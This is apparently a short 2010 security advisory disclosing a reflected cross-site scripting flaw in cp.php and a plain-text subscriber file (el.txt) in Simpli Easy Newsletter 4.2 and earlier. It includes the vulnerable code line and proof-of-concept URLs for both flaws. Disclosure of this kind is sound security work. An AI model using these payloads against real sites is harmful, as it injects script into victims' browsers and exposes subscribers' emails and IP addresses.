Simpli Easy (AFC Simple) NewsLetter 4.2 - Cross-Site Scripting / Information Leakage

Author: p0deje
type: webapps
platform: php
port: 
date_added: 2010-10-30 
date_updated: 2015-07-12 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

Simpli Easy (AFC Simple) Newsletter <= 4.2 XSS/Information Leakage

Date: 30.10.2010
Author: p0deje | http://p0deje.blogspot.com
Software Link: http://scubadivingcalculators.com/simpli-easy-newsletter.php
Version: <= 4.2

  1. Cross-site Scripting

    Vulnerable code:
      cp.php
      ----------------
      6:  <form name="txtlist" action="cp.php?do=<?=$_GET['do']?>"
method="post">

    Proof-of-concept:
      http://www.example.com/cp.php?do="><script>alert(1)</script>

  2. Information Leakage

    By default, application saves subscribed email addresses and
    correspondent IP addresses to plain text file el.txt

    Proof-of-concept:
      http://www.example.com/el.txt